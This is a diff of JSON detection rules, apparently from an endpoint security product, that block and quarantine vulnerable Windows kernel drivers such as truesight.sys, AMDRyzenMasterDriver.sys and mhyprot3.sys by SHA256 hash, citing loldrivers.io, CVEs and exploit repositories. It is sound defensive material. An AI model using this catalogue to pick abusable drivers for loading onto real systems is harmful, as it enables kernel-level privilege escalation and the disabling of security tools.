+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984839Z",
+ "creation_date": "2026-03-23T11:45:29.984841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f43d977a5fb1bdc10837e7c4ff03526d2b8fa9757da9dd8bd6514cd31748a858",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrSmartConnectDrv.Sys) [https://www.loldrivers.io/drivers/57f63efb-dc43-4dba-9413-173e3e4be750/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1f798e3-a0f4-5563-9949-a5353781c4cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975411Z",
+ "creation_date": "2026-03-23T11:45:29.975413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ad2d2fe1b16e42f43788dae1f0f45031b5025ef6bcc52360e18812820682f04",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1fdd0f6-1d05-5427-bb5a-4376e86e88ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483992Z",
+ "creation_date": "2026-03-23T11:45:31.483996Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484006Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfdb92dbe9139a155de234bbfa711b98fa3de517456d493a893416836bf6980e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2030bd3-093f-5ab6-aa1b-b4d8e042d93c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478665Z",
+ "creation_date": "2026-03-23T11:45:30.478669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e505569892551b2ba79d8792badff0a41faea033e8d8f85c3afea33463c70bd9",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f20cd15a-7bcf-55af-9382-34a1b17b6769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816141Z",
+ "creation_date": "2026-03-23T11:45:31.816144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4fe6fdcc1b3435a182e6f3425008f4db2a20154f76cb83745d202c30182c2e6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f218ce3f-d1de-5d2b-ad06-1a52680b1759",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159211Z",
+ "creation_date": "2026-03-23T11:45:31.159213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "915c0bc56291c65b9261e47b14a49ebbc08b7df4e05eb1905526950f263dc956",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f223c386-4424-5bd0-a34f-11a45c6bd7b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452124Z",
+ "creation_date": "2026-03-23T11:45:30.452128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "292ada92cd442f78bfafe4098105c5e3f2427589f32ee5999d90b61c422fa445",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f22a67df-fc5d-5eee-985c-b921e0511785",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823827Z",
+ "creation_date": "2026-03-23T11:45:30.823829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2c0f60a05123a3c8fd93c8a3e8c1c276d1f0966b31f0981cf7c269098e0defb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f22b563e-1309-5632-acf9-2e8a89ba9d47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452278Z",
+ "creation_date": "2026-03-23T11:45:30.452282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91793baa79b630f452267c408cc7509f25aa7ac0e39e88576e3daed3dcd5d8e5",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f232cd25-ab49-5580-84ab-1317e112a45b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605082Z",
+ "creation_date": "2026-03-23T11:45:29.605084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a742196d6446e5178c3d46180d53889d962f3b1a19bc3439f71cc6ac7b15f430",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2377ffe-c276-5a49-8f03-64e653f22ec0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146691Z",
+ "creation_date": "2026-03-23T11:45:31.146693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f7f051b49360911cb55e80b8f787582f2d9689f9b9dc19f47ca701acb8a6e1d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f24c4f57-0420-538a-b901-9176e64e3186",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982748Z",
+ "creation_date": "2026-03-23T11:45:29.982750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba",
+ "comment": "Vulnerable Kernel Driver (aka d4.sys) [https://www.loldrivers.io/drivers/c2e70ee6-2f13-4d43-ad5a-c2bf033cc457/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f25384b6-7caa-511e-8a30-f0b4dffabeab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479332Z",
+ "creation_date": "2026-03-23T11:45:30.479334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ae42c1f11a98dee07a0d7199f611699511f1fb95120fabc4c3c349c485467fe",
+ "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv_1_0_32.sys) [https://www.loldrivers.io/drivers/02e4a30f-8aa8-4ff0-8e02-1bff1d0f088f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f253c20a-a844-50cf-be15-e0eb8f1280d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974679Z",
+ "creation_date": "2026-03-23T11:45:29.974681Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35a7be9b0cde8c3d409a472a320541df070d7af6008e6458a05947f2591da9b5",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2545873-d660-5d71-8f71-8c8079b56d1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489022Z",
+ "creation_date": "2026-03-23T11:45:31.489024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "803753e083138c834cd826128e990ee00f45f3be01f1de93e800672e4b00209b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f25476cb-c961-5296-a938-571ac89b63dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819481Z",
+ "creation_date": "2026-03-23T11:45:30.819483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819488Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d008e636e74c846fe7c00f90089ff725561cb3d49ce3253f2bbfbc939bbfcb2",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f258fd4a-592b-5e68-89b7-96b87ec8025e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836338Z",
+ "creation_date": "2026-03-23T11:45:30.836342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0589f6c3c50acf2e31b94c0b8a2813a77bb1706c9aa1ae0430417007028ca3ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f264824b-4d3a-5b15-b036-f336fa108edc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490120Z",
+ "creation_date": "2026-03-23T11:45:31.490122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8ff77d20034c3b0e9bd85f352be45931df0e961373a47538d141339d5785ded",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f26b20bd-b63f-5e32-91b8-e2e89ba66add",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147788Z",
+ "creation_date": "2026-03-23T11:45:31.147790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c2d5e8cc34820d4627ec5a5c11f9faef59900ae8d5170d6f358e7c2b8a6b25a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2710301-9527-595e-a5e1-08fa703c27da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812434Z",
+ "creation_date": "2026-03-23T11:45:31.812436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c03d1d6012201bb79d3f8ad1e34e984c9ba537ea8c4d94b935bbcbec0c029774",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f27bb10d-c820-5cab-8145-7eba362fc54a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161164Z",
+ "creation_date": "2026-03-23T11:45:31.161166Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a17bee49182c0edc10ac25613f218cd761d0fca0e3bc73e2b61c79a4a52634a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f281084a-ccea-5845-8e2f-f5d6002bcaa3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832532Z",
+ "creation_date": "2026-03-23T11:45:30.832534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f2cdd3226b9362cdf99626e0eef83dcbe977585f366edc81e96b95f80289c76",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f283d6e4-cfce-5da7-8875-d328a33dd1cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
